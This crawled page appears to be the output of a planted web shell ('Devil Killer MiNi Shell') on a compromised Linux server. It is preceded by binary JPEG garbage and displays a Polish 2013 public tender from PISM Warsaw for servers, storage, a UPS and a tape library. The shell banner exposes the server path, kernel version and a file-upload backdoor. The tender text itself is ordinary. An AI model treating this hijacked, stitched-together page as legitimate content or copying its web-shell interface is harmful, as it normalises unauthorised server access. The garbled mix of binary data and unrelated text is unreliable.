JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131107/455454-N-2013.html

<p class="kh_header"><b>Warszawa: Zakup serwera, macierzy i biblioteki taśmowej wraz z oprogramowaniem, montażem i instalacją na potrzeby Biblioteki Cyfrowej Polskiego Instytutu Spraw Międzynarodowych w Warszawie</b><br>
<b>Numer ogłoszenia: 455454 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polski Instytut Spraw Międzynarodowych , ul. Warecka 1a, 00-950 Warszawa, woj. mazowieckie, tel. 22 5568000, faks 22 5568099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pism.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup serwera, macierzy i biblioteki taśmowej wraz z oprogramowaniem, montażem i instalacją na potrzeby Biblioteki Cyfrowej Polskiego Instytutu Spraw Międzynarodowych w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I -  Macierz, serwer, UPS
Minimalne wymagania techniczne - Macierz

Obudowa	Do instalacji w standardowej szafie RACK 19 dostarczona wraz ze wszystkimi elementami umożliwiającymi ww. instalację. Obudowa maksymalnie 2U.
Kontrolery	Dwa kontrolery SAS RAID pracujące w układzie active-active. Umożliwiające podłączenia dwóch serwerów ze skonfigurowanymi funkcjami wysokiej dostępności HA lub ośmiu serwerów bez technologii HA do jednego systemu pamięci masowej za pomocą złącza SAS, posiadające łącznie minimum osiem portów SAS (SSF-8088) do podłączenia serwerów. Wymagane poziomy RAID 0,1,5,6,10, niezależny dostęp do dysku każdego z kontrolerów.
Cache2GB na kontroler, pamięć cache zapisu mirrorowana między kontrolerami z opcją zapisu na dysk lub inną pamięć nieulotną lub podtrzymywanie bateryjnie przez min. 72h w razie awarii.
Dyski	Zainstalowanych 12 dysków Hot-Plug SAS 3,5 cala o pojemności 600 GB i prędkości 15 tyś. obr.min. Możliwość rozbudowy przez dokładanie kolejnych dysków/półek dyskowych do łącznie minimum 192 dysków, również dysków o prędkości 7200 i pojemości 2 TB minimum. Możliwość mieszania typów dysków w obrębie macierzy oraz pojedynczej półki.
Oprogramowanie	Zarządzające macierzą w tym powiadamianie mailem o awarii, umożliwiające mapowanie dysków. 
Funkcja kopii migawkowych (minimum 5). Możliwość rozbudowywania oprogramowania o funkcjonalność pełnych kopii dysków logicznych. Licencja macierzy powinna umożliwiać podłączanie minimum 5 hostów bez konieczności zakupu dodatkowych licencji dla macierzy.
Wsparcie dla systemów operacyjnych	VMWare vSphere 5
Bezpieczeństwo	Ciągła praca obu kontrolerów nawet w przypadku zaniku jednej z faz zasilania. Zasilacze, wentylatory, kontrolery RAID redundantne.
Dokumentacja	Zamawiający wymaga dokumentacji w języku polskim lub angielskim
Warunki gwarancji	Przynajmniej trzy lata gwarancji z czasem reakcji na zgłoszenie awarii maksymalnie do następnego dnia roboczego od zgłoszenia.
Dostawca ponosi koszty napraw gwarancyjnych włączając w to koszt części i transportu.
Pozostałe wyposażenie	Kabel zasilający urządzenie - 2 szt.
Kabel SAS (SSF-8088) do podłączenia serwer - 8 szt.
System montażu RACK - kpl.

Minimalne wymagania techniczne - Serwer
Obudowa	Do instalacji w standardowej szafie RACK 19 dostarczona wraz ze wszystkimi elementami umożliwiającymi ww. instalację. Obudowa maksymalnie 2U.
Płyta główna Z możliwością zainstalowania dwóch procesorów 
Liczba zainstalowanych procesorów	2
Procesor Minimum 2,6 GHz, minimum 6 rdzeni na każdy procesor, 64-bit, obsługa sprzętowej wirtualizacji, pamięć cache L3 minimum 12MB
Zainstalowana pamięć 
RAM	4x16 GB RDIMM, 1333 Mhz
Możliwość dołożenia minimum 8 kości pamięci
Karty rozszerzeń 	Dedykowane kontroler dyskowy RAID zapewniające funkcjonalność zabezpieczenia na poziomach: RAID 0, 1, 5, 10 oraz posiadający minimum dwa zewnętrzne  interfejsy SAS 6GB - złącze SFF8088 do podłączenia macierzy dyskowej
Napęd optyczny 	Wewnętrzny napęd DVD 
Kontroler zdalnego zarządzania	Kontroler zdalnego zarządzania niezależny od zainstalowanego na serwerze systemu operacyjnego posiadający dedykowane złącze RJ-45 umożliwiający: zdalne monitorowanie i informowanie o statusie serwera, szyfrowane połączenie oraz autentykację i autoryzację użytkownika, wirtualną konsolę z dostępem do myszy, klawiatury, możliwość podmontowania zdalnych wirtualnych napędów, operacje na zasilaniu serwera (reboot, shutdown, startup).
Dyski twarde	Min. 3 napędy dyskowe każdy min. 143GB typu hot-swap SAS
min. 15krpm
Karta graficzna	Zintegrowana karta graficzna
Porty Ethernet	Minimum 4 x Gigabit Ethernet
Elementy redundantne	Zasilacze z funkcjonalnością Hot-Swap (min. 2 zasilacze), wentylatory z funkcjonalnością Hot-Swap
Interfejsy 	Minimum 1 x szeregowy - RS-232
Minimum 1 video - VGA
Minimum 4 sieć - Ethernet 10Base -T,100Base-TX,1000Base-TX - RJ-45
Minimum 1 zarządzający - RJ-45
Minimum 4 Hi-Speed USB
Minimum 2 mini-SAS (SFF-8088) 
Zgodność sprzętu z oprogramowaniem	VMware vSphare5
VMware vSphare5.1
Microsoft Windows Server 2012
Microsoft Windows Server 2008 R2 SP1
Dokumentacja użytkownika	Dokumentacja w języku polskim lub angielskim
Warunki gwarancji Przynajmniej trzy lata gwarancji z czasem reakcji na zgłoszenie awarii maksymalnie do następnego dnia roboczego od zgłoszenia.
Dostawca ponosi koszty napraw gwarancyjnych włączając w to koszt części i transportu.


Minimalne wymagania techniczne - UPS
Forma Obudowa do montażu w 19 szafie Rack
w komplecie elementy montażu w Rack19 
Moc wyjściowa 	Minimum 4200W 6000 VA  
Zniekształcenia napięcia wyjściowego	Mniej niż 3%
Rodzaj akumulatorów 	bezobsługowe 
Nominalne zasilanie wejściowe 	230 V - 50 Hz 
Nominalne napięcie wyjściowe 	230 V - 50 Hz
Gniazda wyjściowe	Minimum 8 wyjść IEC 320 C13
Minimum 2 gniazd typ IEC 320 C19
Interfejs komunikacyjny urządzenia	DB-9
RJ-45 (10/100 Base-T)
Protokoły obsługiwane przez urządzenia 	SNMP
TCP-IP 4
HTTP-HTTPS
Panel przedni	Wyświetlacz statusu LED z paskiem obciążenia i naładowania akumulatora oraz pracy online Zasilanie akumulatorowe: Wymień akumulator Wskaźniki przeciążenia i obejścia
Alarm dźwiękowy	Alarm przy zasilaniu akumulatora alarm przy bardzo niskim poziomie naładowania akumulatora: ciągły sygnał dźwiękowy sygnalizujący przeciążenie
Ochrona przed przepięciami i filtracja	Filtracja - Nieprzerwane filtrowanie zakłóceń na wielu biegunach Przepuszczanie przepięć 0, 3% wg IEEE zerowy czas powstrzymywania przepięcia spełnia wymogi UL 1449
Wysokość w szafie przemysłowej	Wielkość UPS maksymalnie 3U - bez dodatkowych baterii
Każdy dodatkowy system akumulatorowy maksymalnie 3U
Całość zestawu UPS wraz z akumulatorami nie powinien przekraczać 9U
Dodatkowe baterie	Możliwość rozszerzenia pojemności UPS przez dołożenie dodatkowych systemów akumulatorowych - Battery Pack
Certyfikaty i zgodność z normami	Znak C, CE, EN 50091-1, EN 50091-2, EN 55022 klasa A, EN 60950, EN 61000-3-2, GOST, VDE
Okres gwarancji	2 lata gwarancji
Czas podtrzymanie napięcia wyjściowego przy obciążeniu 100%
Minimum 46 min przy 4200 W (po podłączeniu dodatkowych baterii)
Oprogramowanie i jego funkcjonalność 	Pracujące w środowisku Windows na stacji roboczej z wykorzystaniem protokołu IP4
dołączone oprogramowanie umożliwiające monitorowanie urządzenia w zakresie jego parametrów pracy 
Pozostałe wyposażenie	Kabel zasilający urządzenie 1 Komplet kabli zasilania urządzeń serwerowych na wyjściu 8 szt.
System montażu Rack -kpl.

Zamówienie obejmuje rozpakowanie, instalację i konfigurację sprzętu i oprogramowania, zgodnie z wymaganą dokumentacją oraz dostarczenie dokumentacji. Zamówienie zrealizowane zostanie zgodnie z warunkami projektu umowy, stanowiącej Załącznik nr 9 do SIWZ.
Wymagania dla oprogramowania wirtualizacji infrastruktury. 


System musi: 

1.	Umożliwiać wirtualizację na 5 serwerach 2-procesorowych
2.	Być instalowany bezpośrednio na serwerze fizycznym bez konieczności instalowania innego systemu operacyjnego
3.	Zapewnienie możliwość obsługi wielu instancji systemów operacyjnych na jednym serwerze fizycznym i powinno się charakteryzować maksymalnym możliwym stopniem konsolidacji sprzętowej
4.	System musi umożliwiać jednoczesną pracę wielu różnych maszyn wirtualnych na współdzielonych zasobach serwera (systemy operacyjne i działające w nich aplikacje)
5.	Pozwalać na przenoszenie maszyn wirtualnych pomiędzy serwerami fizycznymi bez przerywania pracy aplikacji pracujących na maszynach wirtualnych;
6.	Umożliwiać tworzenie klastrów z hostów fizycznych w celu zapewnienia wysokiej dostępności maszyn wirtualnych i aplikacji (ang. High Availability)
7.	Posiadać zdolność do automatycznego ponownego uruchomienia maszyny wirtualnej w przypadku jej awarii
8.	Pozwalać na wykonywanie wielu migawek stanu maszyn wirtualnych (Snapshot)
9.	Umożliwiać przywrócenie maszyny do każdego ze stanów utrwalonych przez przechowywane snapshoty
10.	Umożliwiać klonowanie maszyn wirtualnych bez potrzeby ich wyłączania
11.	Posiadać centralną konsolę graficzną do zarządzania wieloma maszynami wirtualnymi oraz ich zasobami pracującymi na nie mniej niż 5 serwerach fizycznych, która musi umożliwiać monitorowanie dostępności i wydajności maszyn wirtualnych
12.	Oferować dostęp do widoku topologii całego systemu i zbioru maszyn wirtualnych wraz z ich zasobami dyskowym
13.	Nie zawierać ograniczenia ani na okres ważności licencji ani na okres używania oprogramowania
14.	Zawierać przynajmniej 3-letni okres wsparcia technicznego świadczonego przez producenta oprogramowania wirtualizacyjnego drogą telefoniczną oraz poprzez pocztę elektroniczną lub stronę internetową przez 5 dni w tygodniu 12 godzin i obejmujące dostęp do do bazy wiedzy technicznej, systemu zgłoszeń,  bezpłatnych aktualizacji upgradey i updatey oprogramowania.
Wymagania dodatkowe:
oferowane oprogramowanie musi pochodzić od jednego producenta
oprogramowanie musi mieć możliwość rozbudowy do funkcjonalności umożliwiającej przygotowanie zapasowej maszyny wirtualnej w taki sposób, aby w przypadku awarii możliwe było przeniesienie wykonywania zadań z podstawowej maszyny wirtualnej na zapasową bez utraty zadań, procesów, wątków i danych (ang. Fault Tolerance)
Zamawiający uprawniony jest do zakupu licencji edukacyjnych

Oprogramowanie Backupujące: 
5 sztuk - Symantec Backup Exec 2012 Agent  for VMware and Hyper-V - licencja do posiadanego przez PISM programu - Symantec Exec Backup 2012
Zamawiający uprawniony jest do zakupu licencji edukacyjnych. 

Opis przedmiotu zamówienia - Część II
Minimalne wymagania techniczne - Biblioteka taśmowa 
Obudowa	Do instalacji w standardowej szafie RACK 19 dostarczona wraz ze wszystkimi elementami umożliwiającymi ww. instalację. Obudowa maksymalnie 4U.
Typ napędu	Napęd LTO-5 SAS
Kontroler	Minimum 2 mini-SAS (SFF-8088) porty zewnętrzne
Liczba gniazd kasety z tonerem	Minimum 24
Pojemność 	Minimalna pojemność przy kompresji 2 1 144TB 
Interfejs napędu	6 Gb na sek SAS 
Kontroler zdalnego zarządzania	Interface zdalnego zarządzania posiadający dedykowane złącze RJ-45
Dokumentacja	Zamawiający wymaga dokumentacji w języku polskim lub angielskim
Warunki gwarancji	Przynajmniej trzy lata gwarancji z czasem reakcji na zgłoszenie awarii maksymalnie do następnego dnia roboczego od zgłoszenia.
Dostawca ponosi koszty napraw gwarancyjnych włączając w to koszt części i transportu.
Dodatkowe wyposażenie Biblioteka zostanie dostarczona wraz z kompletem 26 taśm dedykowanych do dostarczonych napędów, LTO Ultrium-5 z możliwością wielokrotnego zapisu oraz z 2 taśmami czyszczącymi.

Zamówienie obejmuje rozpakowanie, instalację i konfigurację sprzętu i oprogramowania, zgodnie z wymaganą dokumentacją oraz dostarczenie dokumentacji. Zamówienie zrealizowane zostanie zgodnie z warunkami projektu umowy, stanowiącej Załącznik nr 9 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 30.23.31.41-1, 30.23.39.00-1, 30.23.31.60-0, 30.23.31.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia z art. 22 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż ciągu 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizowali lub realizują co najmniej 2 zamówienia polegające na dostawie serwera i macierzy wraz z oprogramowaniem, montażem i instalacją o wartości minimum 150 000 zł brutto każde.
Warunek dotyczy I części zamówienia.

Wykonawcy wykażą, iż w ciągu 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizowali lub realizują co najmniej 1 zamówienie polegające na dostawie biblioteki taśmowej  wraz z oprogramowaniem o wartości minimum 50 000 zł brutto. 
Warunek dotyczy II części zamówienia.

UWAGA: W przypadku oferty na cały przedmiot zamówienia, tj. Część I i Część II  Wykonawca zobowiązany jest wykazać posiadanie doświadczenia zgodnie z wymaganiami określonymi w ppkt 1.1 i 1.2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia z art. 22 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż dysponują lub będą dysponować  osobami posiadającymi co najmniej 2-letnie doświadczenie związane z montażem, instalacją serwera i macierzy wraz z oprogramowaniem.
Warunek dotyczy I Części zamówienia.
Zamawiający nie określa warunku w zakresie zapisu ust. 1 lit c SIWZ w odniesieniu do Części II zamówienia  - Zakup biblioteki taśmowej wraz z oprogramowaniem, montażem i instalacją na potrzeby Biblioteki Cyfrowej Polskiego Instytutu Spraw Międzynarodowych w Warszawie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia z art. 22 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta zawiera wypełniony Formularz ofertowy, stanowiący  Załącznik nr 2 do SIWZ oraz niżej wymienione oświadczenia i dokumenty
1)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wzór - Załącznik nr 7 do SIWZ). Pełnomocnik musi  być ustanowiony (w myśl art. 23 ust. 2 ustawy Pzp) do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wyboru oferty najkorzystniejszej Konsorcjum, Zamawiający przed podpisaniem umowy w sprawie zamówienia publicznego, wymaga przedstawienia umowy  regulującej zasady współpracy, w tym między innymi określającej:
a)	dane Wykonawców,
b)	określenie celu gospodarczego,
c)	określenie wzajemnych ról w realizacji powierzonego zamówienia,
d)	określenie lidera, który pełnić będzie rolę pełnomocnika uprawnionego do wszystkich kontaktów w sprawie realizacji i  rozliczenia umowy,
e)	zasadę odpowiedzialności solidarnej Wykonawców, wchodzących w skład Konsorcjum w przypadku niewykonania lub nienależytego wykonania przedmiotu  umowy,
